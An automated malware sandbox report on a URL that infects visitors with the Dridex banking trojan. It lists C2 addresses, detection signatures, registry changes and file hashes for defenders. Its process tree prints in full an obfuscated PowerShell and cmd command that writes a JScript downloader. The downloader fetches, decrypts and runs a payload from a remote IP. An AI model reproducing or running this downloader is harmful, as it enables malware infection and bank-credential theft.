http://zero.testtrack.xyz/

General
  Target     http://zero.testtrack.xyz/
  Filesize   N/A
  Completed  08-02-2021 23:46
  Score      10/10
Malware Config

Extracted
  Family  dridex
  Botnet  10111
  C2      51.68.224.245:4646
          188.165.17.91:8443
          173.255.246.77:691
  rc4.plain
Signatures 16

  • Dridex

    Description

    Dridex (also known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess
    WerFault.exe

    Reported IOCs

    description | pid | process | target process
    PID 416 created 2492 | 416 | WerFault.exe | IEXPLORE.EXE
  • CryptOne packer

    Description

    Detects the CryptOne packer as defined in the NCC blog post.

    Reported IOCs

    resource | yara_rule
    behavioral1/files/0x0003000000019c0b-31.dat | cryptone
    behavioral1/files/0x0003000000019c0b-30.dat | cryptone
  • Dridex Loader

    Description

    Detects the Dridex loader (both x86 and x64) in memory.

    Reported IOCs

    resource | yara_rule
    behavioral1/memory/208-32-0x0000000000400000-0x000000000043D000-memory.dmp | dridex_ldr
    behavioral1/memory/208-34-0x0000000000400000-0x000000000043D000-memory.dmp | dridex_ldr
  • Blocklisted process makes network request
    wscript.exe

    Reported IOCs

    flow | pid | process
    22 | 1568 | wscript.exe
  • Executes dropped EXE
    pogps.exe

    Reported IOCs

    pid | process
    208 | pogps.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    TTPs

    Query Registry
  • Checks whether UAC is enabled
    pogps.exe

    TTPs

    System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | pogps.exe
  • Program crash
    WerFault.exe

    Reported IOCs

    pid | pid_target | process | target process
    416 | 2492 | WerFault.exe | IEXPLORE.EXE
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies Internet Explorer settings
    iexplore.exe, IEXPLORE.EXE

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3514538792" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FCB1C28E-6A67-11EB-BEBD-5649AA4EDE66} = "0" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30867060" | iexplore.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager | iexplore.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3514538792" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30867060" | iexplore.exe
  • Suspicious behavior: EnumeratesProcesses
    WerFault.exe, PowerShell.exe

    Reported IOCs

    pid | process
    416 | WerFault.exe (reported 17 times)
    648 | PowerShell.exe (reported 3 times)
  • Suspicious use of AdjustPrivilegeToken
    WerFault.exe, PowerShell.exe

    Reported IOCs

    description | pid | process
    Token: SeRestorePrivilege | 416 | WerFault.exe
    Token: SeBackupPrivilege | 416 | WerFault.exe
    Token: SeDebugPrivilege | 416 | WerFault.exe
    Token: SeDebugPrivilege | 648 | PowerShell.exe
  • Suspicious use of FindShellTrayWindow
    iexplore.exe

    Reported IOCs

    pid | process
    1028 | iexplore.exe
  • Suspicious use of SetWindowsHookEx
    iexplore.exe, IEXPLORE.EXE

    Reported IOCs

    pid | process
    1028 | iexplore.exe (reported twice)
    2492 | IEXPLORE.EXE (reported twice)
  • Suspicious use of WriteProcessMemory
    iexplore.exe, IEXPLORE.EXE, PowerShell.exe, cmd.exe, wscript.exe, cmd.exe

    Reported IOCs

    description | pid | process | target process
    PID 1028 wrote to memory of 2492 | 1028 | iexplore.exe | IEXPLORE.EXE
    PID 2492 wrote to memory of 648 | 2492 | IEXPLORE.EXE | PowerShell.exe
    PID 648 wrote to memory of 904 | 648 | PowerShell.exe | cmd.exe
    PID 904 wrote to memory of 1568 | 904 | cmd.exe | wscript.exe
    PID 1568 wrote to memory of 636 | 1568 | wscript.exe | cmd.exe
    PID 636 wrote to memory of 208 | 636 | cmd.exe | pogps.exe
    (each row was reported three times)
Processes 8
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://zero.testtrack.xyz/
    Modifies Internet Explorer settings
    Suspicious use of FindShellTrayWindow
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1028 CREDAT:82945 /prefetch:2
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2492
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=^&XTBMeA^&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv^&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5^&vSerGMTI1Mg== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:648
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=^&XTBMeA^&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv^&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5^&vSerGMTI1Mg== 1
          Suspicious use of WriteProcessMemory
          PID:904
          • C:\Windows\SysWOW64\wscript.exe
            wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=&XTBMeA&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5&vSerGMTI1Mg== 1
            Blocklisted process makes network request
            Suspicious use of WriteProcessMemory
            PID:1568
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c pogps.exe
              Suspicious use of WriteProcessMemory
              PID:636
              • C:\Users\Admin\AppData\Local\Temp\pogps.exe
                pogps.exe
                Executes dropped EXE
                Checks whether UAC is enabled
                PID:208
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 2424
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:416
MITRE ATT&CK Matrix
Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation
Downloads
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5     88acae3e364010e82fb022c29ab69c9d
    SHA1    043f08caaf36d317c60977dd9bdaa2be62ed54a0
    SHA256  f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b
    SHA512  38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

  • C:\Users\Admin\AppData\Local\Temp\pogps.exe
    MD5     ef10edc180a8e7ccf3240bbb5a73d08b
    SHA1    b5acf4ab8d560d36d96e91419ba79f1eff6089cc
    SHA256  f2033c521ba361036d11483e0097233ec2571f4ba5d44c3e828b9b83d379cfb0
    SHA512  33fcbeb19040d485fb95588d6e58a800771a9fc74b6e676cc4845c9cb9a633b69642caf2a2691a9f25b2d1596d4df23f90211645bfd50112bdf5369e575e6782
